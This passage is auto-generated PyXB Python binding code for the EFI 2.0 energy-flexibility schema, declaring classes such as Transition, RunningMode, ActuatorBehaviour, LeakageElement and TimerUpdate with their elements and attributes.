    __startTimers = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'startTimers'), 'startTimers', '__httpwww_flexiblepower_orgefi_2_Transition_httpwww_flexiblepower_orgefi_2startTimers', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 461, 3), )
    startTimers = property(__startTimers.value, __startTimers.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}blockingTimers uses Python identifier blockingTimers
    __blockingTimers = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'blockingTimers'), 'blockingTimers', '__httpwww_flexiblepower_orgefi_2_Transition_httpwww_flexiblepower_orgefi_2blockingTimers', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 462, 3), )
    blockingTimers = property(__blockingTimers.value, __blockingTimers.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}fromRunningModeId uses Python identifier fromRunningModeId
    # Required int attribute.
    __fromRunningModeId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fromRunningModeId'), 'fromRunningModeId', '__httpwww_flexiblepower_orgefi_2_Transition_httpwww_flexiblepower_orgefi_2fromRunningModeId', pyxb.binding.datatypes.int, required=True)
    __fromRunningModeId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 464, 2)
    __fromRunningModeId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 464, 2)
    fromRunningModeId = property(__fromRunningModeId.value, __fromRunningModeId.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}toRunningModeId uses Python identifier toRunningModeId
    # Required int attribute.
    __toRunningModeId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'toRunningModeId'), 'toRunningModeId', '__httpwww_flexiblepower_orgefi_2_Transition_httpwww_flexiblepower_orgefi_2toRunningModeId', pyxb.binding.datatypes.int, required=True)
    __toRunningModeId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 465, 2)
    __toRunningModeId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 465, 2)
    toRunningModeId = property(__toRunningModeId.value, __toRunningModeId.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}transitionCost uses Python identifier transitionCost
    # Optional double attribute (no required=True).
    __transitionCost = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'transitionCost'), 'transitionCost', '__httpwww_flexiblepower_orgefi_2_Transition_httpwww_flexiblepower_orgefi_2transitionCost', pyxb.binding.datatypes.double)
    __transitionCost._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 466, 2)
    __transitionCost._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 466, 2)
    transitionCost = property(__transitionCost.value, __transitionCost.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}transitionDuration uses Python identifier transitionDuration
    # Optional xs:duration attribute (no required=True).
    __transitionDuration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'transitionDuration'), 'transitionDuration', '__httpwww_flexiblepower_orgefi_2_Transition_httpwww_flexiblepower_orgefi_2transitionDuration', pyxb.binding.datatypes.duration)
    __transitionDuration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 467, 2)
    __transitionDuration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 467, 2)
    transitionDuration = property(__transitionDuration.value, __transitionDuration.set, None, None)
    # Register the declared elements/attributes for pyxb's parse/serialize machinery.
    _ElementMap.update({
        __startTimers.name() : __startTimers,
        __blockingTimers.name() : __blockingTimers
    })
    _AttributeMap.update({
        __fromRunningModeId.name() : __fromRunningModeId,
        __toRunningModeId.name() : __toRunningModeId,
        __transitionCost.name() : __transitionCost,
        __transitionDuration.name() : __transitionDuration
    })
# Expose the binding at module scope and register it in the namespace category map.
_module_typeBindings.Transition = Transition
Namespace.addCategoryObject('typeBinding', 'Transition', Transition)
# Complex type {http://www.flexiblepower.org/efi-2}RunningMode with content type EMPTY
# PyXB-generated binding class — regenerate from the XSD rather than editing by hand.
class RunningMode (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}RunningMode with content type EMPTY"""
    # EMPTY content: attributes only, no child elements or text.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    # Abstract in the schema (_Abstract = True); derived types carry the concrete content.
    _Abstract = True
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'RunningMode')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 573, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}id uses Python identifier id
    # Required int attribute. The property intentionally shadows the builtin
    # `id` at class scope to mirror the schema attribute name.
    __id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpwww_flexiblepower_orgefi_2_RunningMode_httpwww_flexiblepower_orgefi_2id', pyxb.binding.datatypes.int, required=True)
    __id._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 574, 2)
    __id._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 574, 2)
    id = property(__id.value, __id.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}label uses Python identifier label
    # Required string attribute.
    __label = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'label'), 'label', '__httpwww_flexiblepower_orgefi_2_RunningMode_httpwww_flexiblepower_orgefi_2label', pyxb.binding.datatypes.string, required=True)
    __label._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 575, 2)
    __label._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 575, 2)
    label = property(__label.value, __label.set, None, None)
    # Register the declared attributes for pyxb's parse/serialize machinery.
    _ElementMap.update({
        
    })
    _AttributeMap.update({
        __id.name() : __id,
        __label.name() : __label
    })
# Expose the binding at module scope and register it in the namespace category map.
_module_typeBindings.RunningMode = RunningMode
Namespace.addCategoryObject('typeBinding', 'RunningMode', RunningMode)
# Complex type {http://www.flexiblepower.org/efi-2}StorageRunningModeElement with content type EMPTY
# PyXB-generated binding class — regenerate from the XSD rather than editing by hand.
class StorageRunningModeElement (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}StorageRunningModeElement with content type EMPTY"""
    # EMPTY content: attributes only, no child elements or text.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    # Abstract in the schema (_Abstract = True).
    _Abstract = True
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageRunningModeElement')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 577, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}fillLevelLowerBound uses Python identifier fillLevelLowerBound
    # Required double attribute.
    __fillLevelLowerBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fillLevelLowerBound'), 'fillLevelLowerBound', '__httpwww_flexiblepower_orgefi_2_StorageRunningModeElement_httpwww_flexiblepower_orgefi_2fillLevelLowerBound', pyxb.binding.datatypes.double, required=True)
    __fillLevelLowerBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 578, 2)
    __fillLevelLowerBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 578, 2)
    fillLevelLowerBound = property(__fillLevelLowerBound.value, __fillLevelLowerBound.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}fillLevelUpperBound uses Python identifier fillLevelUpperBound
    # Required double attribute.
    __fillLevelUpperBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fillLevelUpperBound'), 'fillLevelUpperBound', '__httpwww_flexiblepower_orgefi_2_StorageRunningModeElement_httpwww_flexiblepower_orgefi_2fillLevelUpperBound', pyxb.binding.datatypes.double, required=True)
    __fillLevelUpperBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 579, 2)
    __fillLevelUpperBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 579, 2)
    fillLevelUpperBound = property(__fillLevelUpperBound.value, __fillLevelUpperBound.set, None, None)
    # Register the declared attributes for pyxb's parse/serialize machinery.
    _ElementMap.update({
        
    })
    _AttributeMap.update({
        __fillLevelLowerBound.name() : __fillLevelLowerBound,
        __fillLevelUpperBound.name() : __fillLevelUpperBound
    })
# Expose the binding at module scope and register it in the namespace category map.
_module_typeBindings.StorageRunningModeElement = StorageRunningModeElement
Namespace.addCategoryObject('typeBinding', 'StorageRunningModeElement', StorageRunningModeElement)
# Complex type {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData with content type ELEMENT_ONLY
# PyXB-generated binding class — regenerate from the XSD rather than editing by hand.
class StorageContinuousRunningModeData (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData with content type ELEMENT_ONLY"""
    # ELEMENT_ONLY content: child elements only, no mixed text content.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    # Abstract in the schema (_Abstract = True).
    _Abstract = True
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageContinuousRunningModeData')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 606, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # All child elements below are declared non-plural (False positional flag).
    # Element {http://www.flexiblepower.org/efi-2}fillingRate uses Python identifier fillingRate
    __fillingRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'fillingRate'), 'fillingRate', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2fillingRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 608, 3), )
    fillingRate = property(__fillingRate.value, __fillingRate.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}runningCost uses Python identifier runningCost
    __runningCost = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), 'runningCost', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2runningCost', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 609, 3), )
    runningCost = property(__runningCost.value, __runningCost.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}electricalPower uses Python identifier electricalPower
    __electricalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), 'electricalPower', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2electricalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 610, 3), )
    electricalPower = property(__electricalPower.value, __electricalPower.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}gasFlowRate uses Python identifier gasFlowRate
    __gasFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), 'gasFlowRate', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2gasFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 611, 3), )
    gasFlowRate = property(__gasFlowRate.value, __gasFlowRate.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatTemperature uses Python identifier heatTemperature
    __heatTemperature = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), 'heatTemperature', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2heatTemperature', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 612, 3), )
    heatTemperature = property(__heatTemperature.value, __heatTemperature.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatFlowRate uses Python identifier heatFlowRate
    __heatFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), 'heatFlowRate', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2heatFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 613, 3), )
    heatFlowRate = property(__heatFlowRate.value, __heatFlowRate.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatThermalPower uses Python identifier heatThermalPower
    __heatThermalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), 'heatThermalPower', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2heatThermalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 614, 3), )
    heatThermalPower = property(__heatThermalPower.value, __heatThermalPower.set, None, None)
    # Register the declared elements for pyxb's parse/serialize machinery.
    _ElementMap.update({
        __fillingRate.name() : __fillingRate,
        __runningCost.name() : __runningCost,
        __electricalPower.name() : __electricalPower,
        __gasFlowRate.name() : __gasFlowRate,
        __heatTemperature.name() : __heatTemperature,
        __heatFlowRate.name() : __heatFlowRate,
        __heatThermalPower.name() : __heatThermalPower
    })
    _AttributeMap.update({
        
    })
# Expose the binding at module scope and register it in the namespace category map.
_module_typeBindings.StorageContinuousRunningModeData = StorageContinuousRunningModeData
Namespace.addCategoryObject('typeBinding', 'StorageContinuousRunningModeData', StorageContinuousRunningModeData)
# Complex type {http://www.flexiblepower.org/efi-2}StorageRunningModes with content type ELEMENT_ONLY
# PyXB-generated binding class — regenerate from the XSD rather than editing by hand.
class StorageRunningModes (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}StorageRunningModes with content type ELEMENT_ONLY"""
    # ELEMENT_ONLY content: child elements only, no mixed text content.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageRunningModes')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 649, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}discreteRunningMode uses Python identifier discreteRunningMode
    # NOTE(review): the True positional flag appears to mark this element as
    # plural (may occur multiple times) — confirm against pyxb ElementDeclaration.
    __discreteRunningMode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningMode'), 'discreteRunningMode', '__httpwww_flexiblepower_orgefi_2_StorageRunningModes_httpwww_flexiblepower_orgefi_2discreteRunningMode', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 652, 4), )
    discreteRunningMode = property(__discreteRunningMode.value, __discreteRunningMode.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}continuousRunningMode uses Python identifier continuousRunningMode
    __continuousRunningMode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningMode'), 'continuousRunningMode', '__httpwww_flexiblepower_orgefi_2_StorageRunningModes_httpwww_flexiblepower_orgefi_2continuousRunningMode', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 653, 4), )
    continuousRunningMode = property(__continuousRunningMode.value, __continuousRunningMode.set, None, None)
    # Register the declared elements for pyxb's parse/serialize machinery.
    _ElementMap.update({
        __discreteRunningMode.name() : __discreteRunningMode,
        __continuousRunningMode.name() : __continuousRunningMode
    })
    _AttributeMap.update({
        
    })
# Expose the binding at module scope and register it in the namespace category map.
_module_typeBindings.StorageRunningModes = StorageRunningModes
Namespace.addCategoryObject('typeBinding', 'StorageRunningModes', StorageRunningModes)
# Complex type {http://www.flexiblepower.org/efi-2}ActuatorBehaviour with content type ELEMENT_ONLY
# PyXB-generated binding class — regenerate from the XSD rather than editing by hand.
class ActuatorBehaviour (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}ActuatorBehaviour with content type ELEMENT_ONLY"""
    # ELEMENT_ONLY content: child elements only, no mixed text content.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ActuatorBehaviour')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 657, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}runningModes uses Python identifier runningModes
    __runningModes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModes'), 'runningModes', '__httpwww_flexiblepower_orgefi_2_ActuatorBehaviour_httpwww_flexiblepower_orgefi_2runningModes', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 659, 3), )
    runningModes = property(__runningModes.value, __runningModes.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}timers uses Python identifier timers
    __timers = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timers'), 'timers', '__httpwww_flexiblepower_orgefi_2_ActuatorBehaviour_httpwww_flexiblepower_orgefi_2timers', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 660, 3), )
    timers = property(__timers.value, __timers.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}transitions uses Python identifier transitions
    __transitions = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'transitions'), 'transitions', '__httpwww_flexiblepower_orgefi_2_ActuatorBehaviour_httpwww_flexiblepower_orgefi_2transitions', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 661, 3), )
    transitions = property(__transitions.value, __transitions.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}actuatorId uses Python identifier actuatorId
    # Required int attribute.
    __actuatorId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'actuatorId'), 'actuatorId', '__httpwww_flexiblepower_orgefi_2_ActuatorBehaviour_httpwww_flexiblepower_orgefi_2actuatorId', pyxb.binding.datatypes.int, required=True)
    __actuatorId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 663, 2)
    __actuatorId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 663, 2)
    actuatorId = property(__actuatorId.value, __actuatorId.set, None, None)
    # Register the declared elements/attributes for pyxb's parse/serialize machinery.
    _ElementMap.update({
        __runningModes.name() : __runningModes,
        __timers.name() : __timers,
        __transitions.name() : __transitions
    })
    _AttributeMap.update({
        __actuatorId.name() : __actuatorId
    })
# Expose the binding at module scope and register it in the namespace category map.
_module_typeBindings.ActuatorBehaviour = ActuatorBehaviour
Namespace.addCategoryObject('typeBinding', 'ActuatorBehaviour', ActuatorBehaviour)
# Complex type {http://www.flexiblepower.org/efi-2}LeakageElement with content type EMPTY
# PyXB-generated binding class — regenerate from the XSD rather than editing by hand.
class LeakageElement (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}LeakageElement with content type EMPTY"""
    # EMPTY content: attributes only, no child elements or text.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'LeakageElement')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 665, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}fillLevelLowerBound uses Python identifier fillLevelLowerBound
    # Required double attribute.
    __fillLevelLowerBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fillLevelLowerBound'), 'fillLevelLowerBound', '__httpwww_flexiblepower_orgefi_2_LeakageElement_httpwww_flexiblepower_orgefi_2fillLevelLowerBound', pyxb.binding.datatypes.double, required=True)
    __fillLevelLowerBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 666, 2)
    __fillLevelLowerBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 666, 2)
    fillLevelLowerBound = property(__fillLevelLowerBound.value, __fillLevelLowerBound.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}fillLevelUpperBound uses Python identifier fillLevelUpperBound
    # Required double attribute.
    __fillLevelUpperBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fillLevelUpperBound'), 'fillLevelUpperBound', '__httpwww_flexiblepower_orgefi_2_LeakageElement_httpwww_flexiblepower_orgefi_2fillLevelUpperBound', pyxb.binding.datatypes.double, required=True)
    __fillLevelUpperBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 667, 2)
    __fillLevelUpperBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 667, 2)
    fillLevelUpperBound = property(__fillLevelUpperBound.value, __fillLevelUpperBound.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}leakageRate uses Python identifier leakageRate
    # Required double attribute.
    __leakageRate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'leakageRate'), 'leakageRate', '__httpwww_flexiblepower_orgefi_2_LeakageElement_httpwww_flexiblepower_orgefi_2leakageRate', pyxb.binding.datatypes.double, required=True)
    __leakageRate._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 668, 2)
    __leakageRate._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 668, 2)
    leakageRate = property(__leakageRate.value, __leakageRate.set, None, None)
    # Register the declared attributes for pyxb's parse/serialize machinery.
    _ElementMap.update({
        
    })
    _AttributeMap.update({
        __fillLevelLowerBound.name() : __fillLevelLowerBound,
        __fillLevelUpperBound.name() : __fillLevelUpperBound,
        __leakageRate.name() : __leakageRate
    })
# Expose the binding at module scope and register it in the namespace category map.
_module_typeBindings.LeakageElement = LeakageElement
Namespace.addCategoryObject('typeBinding', 'LeakageElement', LeakageElement)
# Complex type {http://www.flexiblepower.org/efi-2}LeakageFunction with content type ELEMENT_ONLY
# PyXB-generated binding class — regenerate from the XSD rather than editing by hand.
class LeakageFunction (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}LeakageFunction with content type ELEMENT_ONLY"""
    # ELEMENT_ONLY content: child elements only, no mixed text content.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'LeakageFunction')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 670, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}leakageElement uses Python identifier leakageElement
    # NOTE(review): the True positional flag appears to mark this element as
    # plural (may occur multiple times) — confirm against pyxb ElementDeclaration.
    __leakageElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'leakageElement'), 'leakageElement', '__httpwww_flexiblepower_orgefi_2_LeakageFunction_httpwww_flexiblepower_orgefi_2leakageElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 672, 3), )
    leakageElement = property(__leakageElement.value, __leakageElement.set, None, None)
    # Register the declared element for pyxb's parse/serialize machinery.
    _ElementMap.update({
        __leakageElement.name() : __leakageElement
    })
    _AttributeMap.update({
        
    })
# Expose the binding at module scope and register it in the namespace category map.
_module_typeBindings.LeakageFunction = LeakageFunction
Namespace.addCategoryObject('typeBinding', 'LeakageFunction', LeakageFunction)
# Complex type {http://www.flexiblepower.org/efi-2}ActuatorBehaviours with content type ELEMENT_ONLY
# PyXB-generated binding class — regenerate from the XSD rather than editing by hand.
class ActuatorBehaviours (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}ActuatorBehaviours with content type ELEMENT_ONLY"""
    # ELEMENT_ONLY content: child elements only, no mixed text content.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ActuatorBehaviours')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 675, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}actuatorBehaviour uses Python identifier actuatorBehaviour
    # NOTE(review): the True positional flag appears to mark this element as
    # plural (may occur multiple times) — confirm against pyxb ElementDeclaration.
    __actuatorBehaviour = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuatorBehaviour'), 'actuatorBehaviour', '__httpwww_flexiblepower_orgefi_2_ActuatorBehaviours_httpwww_flexiblepower_orgefi_2actuatorBehaviour', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 677, 3), )
    actuatorBehaviour = property(__actuatorBehaviour.value, __actuatorBehaviour.set, None, None)
    # Register the declared element for pyxb's parse/serialize machinery.
    _ElementMap.update({
        __actuatorBehaviour.name() : __actuatorBehaviour
    })
    _AttributeMap.update({
        
    })
# Expose the binding at module scope and register it in the namespace category map.
_module_typeBindings.ActuatorBehaviours = ActuatorBehaviours
Namespace.addCategoryObject('typeBinding', 'ActuatorBehaviours', ActuatorBehaviours)
# Complex type {http://www.flexiblepower.org/efi-2}TimerUpdate with content type ELEMENT_ONLY
# PyXB-generated binding class — regenerate from the XSD rather than editing by hand.
class TimerUpdate (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}TimerUpdate with content type ELEMENT_ONLY"""
    # ELEMENT_ONLY content: child elements only, no mixed text content.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'TimerUpdate')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 697, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}finishedAt uses Python identifier finishedAt
    __finishedAt = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'finishedAt'), 'finishedAt', '__httpwww_flexiblepower_orgefi_2_TimerUpdate_httpwww_flexiblepower_orgefi_2finishedAt', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 699, 3), )
    finishedAt = property(__finishedAt.value, __finishedAt.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}timerId uses Python identifier timerId
    # Required int attribute.
    __timerId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'timerId'), 'timerId', '__httpwww_flexiblepower_orgefi_2_TimerUpdate_httpwww_flexiblepower_orgefi_2timerId', pyxb.binding.datatypes.int, required=True)
    __timerId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 701, 2)
    __timerId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 701, 2)
